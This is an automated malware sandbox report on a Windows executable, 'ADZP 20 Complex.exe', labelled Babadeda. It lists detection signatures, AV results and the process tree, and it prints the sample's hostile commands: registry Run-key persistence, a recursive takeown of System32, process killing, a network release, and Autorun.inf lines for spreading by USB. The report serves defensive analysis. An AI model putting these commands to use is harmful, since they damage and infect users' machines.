Windows Analysis Report
ADZP 20 Complex.exe

Overview

General Information

Sample name: ADZP 20 Complex.exe
Analysis ID: 1428362
MD5: 8b6a377f9a67d5482a8eba5708f45bb2
SHA1: 7197436525e568606850ee5e033c43aea1c3bc91
SHA256: 6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
Tags: exe

Detection

Babadeda
Score: 58
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Babadeda
Command shell drops VBS files
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample is not signed and drops a device driver
Self deletion via cmd or bat file
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: WScript or CScript Dropper
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Recursive Takeown
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • ADZP 20 Complex.exe (PID: 4448 cmdline: "C:\Users\user\Desktop\ADZP 20 Complex.exe" MD5: 8B6A377F9A67D5482A8EBA5708F45BB2)
    • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6128 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6300 cmdline: C:\Windows\system32\cmd.exe /K Twain_20.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4996 cmdline: C:\Windows\system32\cmd.exe /K Twain_20.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 6968 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 6108 cmdline: C:\Windows\system32\cmd.exe /K Taskdl.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • takeown.exe (PID: 5764 cmdline: takeown /f "C:\Windows\System32" /r MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • reg.exe (PID: 1020 cmdline: reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 3596 cmdline: reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • ipconfig.exe (PID: 4912 cmdline: ipconfig /release MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • taskkill.exe (PID: 4432 cmdline: taskkill /im DiskPart /f MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • attrib.exe (PID: 5004 cmdline: attrib -r -a -s -h *.* MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • wscript.exe (PID: 6608 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 2276 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 5832 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 5256 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 3580 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 4144 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 4432 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 7172 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 7188 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 7212 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • msg.exe (PID: 7260 cmdline: msg * Virus Detectado MD5: B42553599E40029366A0FD8F81079BED)
      • msg.exe (PID: 7300 cmdline: msg * Virus Detectado MD5: B42553599E40029366A0FD8F81079BED)
      • msg.exe (PID: 7328 cmdline: msg * Has Sido Hackeado! MD5: B42553599E40029366A0FD8F81079BED)
      • ADZP 20 Complex.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\ADZP 20 Complex.exe" MD5: 8B6A377F9A67D5482A8EBA5708F45BB2)
        • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7504 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • notepad.exe (PID: 7360 cmdline: notepad MD5: 27F71B12CB585541885A31BE22F61C83)
      • calc.exe (PID: 7372 cmdline: calc MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • explorer.exe (PID: 7412 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • mspaint.exe (PID: 7440 cmdline: mspaint.exe MD5: F221A4CCAFEC690101C59F726C95B646)
      • ADZP 20 Complex.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\ADZP 20 Complex.exe" MD5: 8B6A377F9A67D5482A8EBA5708F45BB2)
        • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7820 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • notepad.exe (PID: 7548 cmdline: notepad MD5: 27F71B12CB585541885A31BE22F61C83)
      • calc.exe (PID: 7612 cmdline: calc MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • explorer.exe (PID: 7704 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • mspaint.exe (PID: 7852 cmdline: mspaint.exe MD5: F221A4CCAFEC690101C59F726C95B646)
      • ADZP 20 Complex.exe (PID: 7892 cmdline: "C:\Users\user\Desktop\ADZP 20 Complex.exe" MD5: 8B6A377F9A67D5482A8EBA5708F45BB2)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8116 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • notepad.exe (PID: 8032 cmdline: notepad MD5: 27F71B12CB585541885A31BE22F61C83)
      • calc.exe (PID: 8068 cmdline: calc MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • explorer.exe (PID: 7308 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • Calculator.exe (PID: 7880 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 94675EB54AC5DAA11ACE736DBFA9E7A2)
  • cleanup
Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
No configs have been found
Yara matches (submitted sample):
Source: ADZP 20 Complex.exe, Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Author: Joe Security

Yara matches (dropped files):
Source: C:\Users\user\Desktop\Twain_20.dll, Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Author: Joe Security
Source: C:\Users\user\Desktop\Twain_20.dll, Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Author: Joe Security

Yara matches (unpacked PE files):
Source: 37.2.ADZP 20 Complex.exe.400000.0.unpack, Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Author: Joe Security
Source: 30.0.ADZP 20 Complex.exe.400000.0.unpack, Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Author: Joe Security
Source: 37.0.ADZP 20 Complex.exe.400000.0.unpack, Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Author: Joe Security
Source: 47.2.ADZP 20 Complex.exe.400000.0.unpack, Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Author: Joe Security
Source: 47.0.ADZP 20 Complex.exe.400000.0.unpack, Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Author: Joe Security

System Summary

Source: Threat created, Author: Perez Diego (@darkquassar), oscd.community, Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 4432, StartAddress: F9E9BCC0, TargetImage: C:\Windows\System32\taskkill.exe, TargetProcessId: 4432
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6128, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , ProcessId: 6968, ProcessName: wscript.exe
Source: Process started, Author: frack113, Data: Command: takeown /f "C:\Windows\System32" /r, CommandLine: takeown /f "C:\Windows\System32" /r, CommandLine|base64offset|contains: , Image: C:\Windows\System32\takeown.exe, NewProcessName: C:\Windows\System32\takeown.exe, OriginalFileName: C:\Windows\System32\takeown.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K Taskdl.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6108, ParentProcessName: cmd.exe, ProcessCommandLine: takeown /f "C:\Windows\System32" /r, ProcessId: 5764, ProcessName: takeown.exe
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6128, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , ProcessId: 6968, ProcessName: wscript.exe
Source: Process started, Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Data: Command: explorer.exe, CommandLine: explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6128, ParentProcessName: cmd.exe, ProcessCommandLine: explorer.exe, ProcessId: 7412, ProcessName: explorer.exe
No Snort rule has matched

AV Detection

Source: ADZP 20 Complex.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat, Avira: detection malicious, Label: BAT/Agent.RAA
Source: C:\Users\user\Desktop\Twain_20.dll, Avira: detection malicious, Label: TR/AD.BatBadJoke.javlp
Source: C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat, Avira: detection malicious, Label: BAT/Agent.RAA
Source: C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat, Avira: detection malicious, Label: BAT/Agent.RAA
Source: C:\Users\user\Desktop\Twain_20.dll, Avira: detection malicious, Label: TR/AD.BatBadJoke.javlp
Source: C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat, Avira: detection malicious, Label: BAT/Agent.RAA
Source: C:\Users\user\Desktop\Twain_20.dll, ReversingLabs: Detection: 63%
Source: C:\Windows\System32\Twain_20.dll, ReversingLabs: Detection: 63%
Source: ADZP 20 Complex.exe, ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\Twain_20.dll, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Twain_20.dll, Joe Sandbox ML: detected
Source: ADZP 20 Complex.exe, Joe Sandbox ML: detected
Source: ADZP 20 Complex.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
